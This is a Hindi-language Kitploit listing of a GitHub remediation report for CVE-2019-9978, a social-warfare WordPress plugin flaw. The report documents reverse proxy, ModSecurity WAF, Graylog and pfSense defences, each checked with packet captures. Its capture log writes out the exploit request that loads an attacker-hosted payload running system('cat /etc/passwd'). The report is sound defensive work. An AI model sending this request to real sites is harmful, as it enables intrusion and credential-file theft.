Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Vuln_Remediation_MegaQuagga — MegaQuagga Publishing के लिए निवारण रिपोर्ट, जो CVE-2019-9978 के शमन को प्रगतिशील रक्षात्मक परतों के माध्यम से मान्य करती है। रिवर्स प्रॉक्सी सम्मिलन, ModSecurity WAF तैनाती, Graylog SIEM एकीकरण, और pfSense WAN तथा LAN इंटरफेस पर बहु-चरणीय Wireshark PCAP विश्लेषण का उपयोग करके SSL/TLS प्रवर्तन का दस्तावेजीकरण करती है। | Kitploit
उपकरण/GitHubGitHub/b4ntgrim/vuln_remediation_megaquagga
रक्षात्मक उपकरणभेद्यता विश्लेषणवेब सुरक्षानेटवर्क सुरक्षालर्निंग और शिक्षाघटना प्रतिक्रियालॉग विश्लेषण
GitHubb4ntgrim/vuln_remediation_megaquagga

Vuln_Remediation_MegaQuagga

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
34 महीने पहलेअभी तक समीक्षित नहीं

विवरण

MegaQuagga Publishing के लिए निवारण रिपोर्ट, जो CVE-2019-9978 के शमन को प्रगतिशील रक्षात्मक परतों के माध्यम से मान्य करती है। रिवर्स प्रॉक्सी सम्मिलन, ModSecurity WAF तैनाती, Graylog SIEM एकीकरण, और pfSense WAN तथा LAN इंटरफेस पर बहु-चरणीय Wireshark PCAP विश्लेषण का उपयोग करके SSL/TLS प्रवर्तन का दस्तावेजीकरण करती है।

साझा करें

Vuln_Remediation_MegaQuagga

MegaQuagga प्रकाशन के लिए सुधार रिपोर्ट, जो प्रगतिशील रक्षात्मक परतों के माध्यम से CVE-2019-9978 के शमन को मान्य करती है। इसमें रिवर्स प्रॉक्सी सम्मिलन, ModSecurity WAF तैनाती, Graylog SIEM एकीकरण, और pfSense WAN और LAN इंटरफेस पर बहु-चरणीय Wireshark PCAP विश्लेषण के माध्यम से SSL/TLS प्रवर्तन का दस्तावेज़ीकरण किया गया है।

भेद्यता सुधार — MegaQuagga सुधार रिपोर्ट

विश्लेषक: Samuel Weiss संगठन: 0x2A Security संस्करण: 1.1 (27 अप्रैल, 2026) ग्राहक: MegaQuagga Publishing वर्गीकरण: गोपनीय


अवलोकन

यह परियोजना MegaQuagga प्रवेश परीक्षण के दौरान पहचानी गई भेद्यताओं के सक्रिय सुधार का दस्तावेज़ीकरण करती है, जिसमें CVE-2019-9978 (social-warfare WordPress प्लगइन के माध्यम से दूरस्थ फ़ाइल शामिलीकरण) पर विशेष ध्यान दिया गया है। सुधार को pfSense WAN और LAN दोनों इंटरफेस पर Wireshark का उपयोग करके बहु-चरणीय पैकेट कैप्चर विश्लेषण के माध्यम से मान्य किया गया, प्रत्येक चरण में प्रगतिशील रक्षात्मक नियंत्रण लागू किए गए और पुनः परीक्षण किया गया।


फ़ाइलें

फ़ाइलविवरण
_VULN_REMEDIATION__MegaQuagga_Remediation_Report__Samuel_Weiss_.docxपूर्ण सुधार रिपोर्ट जिसमें कार्यकारी सारांश, किए गए कार्य, PCAP-आधारित सुधार का प्रमाण, और भविष्योन्मुखी अनुशंसाएँ शामिल हैं
_VULN_REMEDIATION__PCAP_worksheet__Samuel_Weiss_.xlsxPCAP विश्लेषण कार्यपत्रक जिसमें पैकेट कैप्चर फ़ाइलें, प्रत्येक सुधार चरण पर ट्रैफ़िक प्रवाह, स्रोत/गंतव्य IP, पोर्ट, और TCP स्ट्रीम एनोटेशन दस्तावेज़ित हैं

दायरा

  • संबोधित भेद्यता: CVE-2019-9978 — social-warfare WordPress प्लगइन के माध्यम से दूरस्थ फ़ाइल शामिलीकरण (RFI)
  • परिवेश: pfSense फ़ायरवॉल के साथ MegaQuagga प्रकाशन WordPress सर्वर
  • दृष्टिकोण: प्रगतिशील रक्षात्मक परतों के साथ प्रत्येक नियंत्रण के बाद शोषण को पुनः निष्पादित करके प्रभावशीलता को मान्य करना

किए गए सुधार कार्य

1. रिवर्स प्रॉक्सी सम्मिलन

WordPress वेब सर्वर के सामने एक रिवर्स प्रॉक्सी तैनात किया गया, जिसने नेटवर्क आर्किटेक्चर को बदल दिया ताकि बाहरी नेटवर्क से बैकएंड एप्लिकेशन सर्वर तक सीधा ट्रैफ़िक संभव न रहे। PCAP साक्ष्य ने प्रॉक्सी परत के माध्यम से ट्रैफ़िक रूटिंग की पुष्टि की।

2. वेब एप्लिकेशन फ़ायरवॉल (WAF) — ModSecurity

रिवर्स प्रॉक्सी पर ModSecurity को WAF परत के रूप में सक्षम किया गया। RFI शोषण के पुनः निष्पादन पर, दुर्भावनापूर्ण swp_url पेलोड को अवरुद्ध कर दिया गया और सर्वर ने HTTP 403 Forbidden लौटाया, जिससे पुष्टि हुई कि WAF नियम शोषण हस्ताक्षर पर ट्रिगर हो रहा था। Graylog SIEM में अलर्ट गतिविधि की पुष्टि की गई।

3. SIEM एकीकरण — Graylog

Graylog को केंद्रीकृत लॉग एकत्रीकरण और अलर्ट निगरानी प्रदान करने के लिए कॉन्फ़िगर किया गया। RFI शोषण हस्ताक्षर का पता लगाने के लिए ModSecurity अलर्ट नियम तैनात किए गए, जिससे हमले के प्रयासों की वास्तविक समय में दृश्यता मिली।

4. SSL/TLS प्रवर्तन और फ़ायरवॉल सख्तीकरण

  • रिवर्स प्रॉक्सी पर SSL ऑफलोडिंग के साथ एक वैध SSL प्रमाणपत्र तैनात किया गया
  • pfSense WAN फ़ायरवॉल नियमों को केवल पोर्ट 443 पर HTTPS की अनुमति देने के लिए अद्यतन किया गया
  • नई इनग्रेस नीति को प्रतिबिंबित करने के लिए NAT नियमों को अद्यतन किया गया
  • पुनः परीक्षण पर, RFI पेलोड अवरुद्ध हो गया और परिवेश में प्रवेश करने में असमर्थ रहा

PCAP कैप्चर लॉग


शोषण ट्रैफ़िक प्रवाह — मुख्य पैकेट विश्लेषण

सुधार-पूर्व (Red-Team-1 / pfSense-LAN-1)

root@kitploit:~
[हमलावर] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[हमलावर]:8000/payload.txt
[WordPress] → GET /payload.txt (हमलावर-होस्टेड PHP पेलोड प्राप्त करता है)
[हमलावर]  → लौटाता है: <pre>system('cat /etc/passwd')</pre>
[WordPress] → /etc/passwd की सामग्री हमलावर को लौटाता है ✅ शोषण सफल

WAF के बाद (pfSense-LAN-3)

root@kitploit:~
[हमलावर] → GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=...
[WAF]       → HTTP 403 Forbidden ✅ शोषण अवरुद्ध

SSL प्रवर्तन के बाद (pfSense-LAN-4)

root@kitploit:~
[हमलावर] → केवल HTTPS; pfSense WAN पर HTTP पोर्ट 80 अवरुद्ध
[pfSense]  → शोषण पेलोड वेब सर्वर तक नहीं पहुँच सकता ✅ शोषण अवरुद्ध

भविष्योन्मुखी अनुशंसाएँ

  1. प्लगइन्स को पैच और ऑडिट रखें — social-warfare को v3.5.3+ पर अपडेट करें; हमले की सतह को कम करने के लिए निष्क्रिय प्लगइन्स हटाएँ
  2. फ़ायरवॉल नियम बनाए रखें — pfSense नियमों की समय-समय पर समीक्षा करें; पोर्ट 80 को अवरुद्ध रखें या HTTPS पर रीडायरेक्ट करें
  3. SIEM अलर्ट की निरंतर निगरानी करें — Graylog अलर्ट नियमों की नियमित रूप से समीक्षा और अद्यतन करें; समय पर प्रतिक्रिया के लिए अलर्ट को एक जिम्मेदार स्वामी को सौंपें
  4. नियमित भेद्यता स्कैनिंग करें — WordPress सर्वर और आस-पास के बुनियादी ढांचे के खिलाफ नियमित स्कैन शेड्यूल करें; गंभीरता-आधारित समयसीमा के अनुसार सुधार करें
  5. न्यूनतम विशेषाधिकार लागू करें — वेब सर्वर प्रक्रियाओं और WordPress उपयोगकर्ता खातों को आवश्यक न्यूनतम अनुमतियों तक सीमित करें

GitHub विवरण

MegaQuagga प्रकाशन के लिए सुधार रिपोर्ट, जो प्रगतिशील रक्षात्मक परतों के माध्यम से CVE-2019-9978 के शमन को मान्य करती है। इसमें रिवर्स प्रॉक्सी सम्मिलन, ModSecurity WAF तैनाती, Graylog SIEM एकीकरण, और pfSense WAN और LAN इंटरफेस पर बहु-चरणीय Wireshark PCAP विश्लेषण के माध्यम से SSL/TLS प्रवर्तन का दस्तावेज़ीकरण किया गया है।

टूल डाउनलोड करें
फ़ाइलदिनांकइंटरफ़ेसफ़िल्टरपैकेटचरण
Red-Team-1.pcapng2025-01-03eth0 (Red-Team)कोई नहीं4,013सुधार-पूर्व आधार रेखा
Red-Team-2.pcapng2026-04-22eth0 (Red-Team)कोई नहीं26,841सुधार-पूर्व (शोषण की पुष्टि)
pfSense-WAN-1.pcap2026-04-22em0 (WAN)192.168.100.x46WAN-पक्ष शोषण ट्रैफ़िक कैप्चर
pfSense-LAN-1.pcap2026-04-23em1 (LAN)192.168.100.x39LAN-पक्ष शोषण ट्रैफ़िक (प्रॉक्सी-पूर्व)
pfSense-LAN-2.pcap2026-04-23em1 (LAN)पोर्ट 80/800045रिवर्स प्रॉक्सी सम्मिलन के बाद
pfSense-LAN-3.pcap2026-04-24em1 (LAN)पोर्ट 80/8000/4431,000WAF सक्षम होने के बाद (403 Forbidden की पुष्टि)
pfSense-LAN-4.pcap2026-04-25em1 (LAN)पोर्ट 81/8000/443534SSL ऑफलोडिंग के बाद (शोषण अवरुद्ध)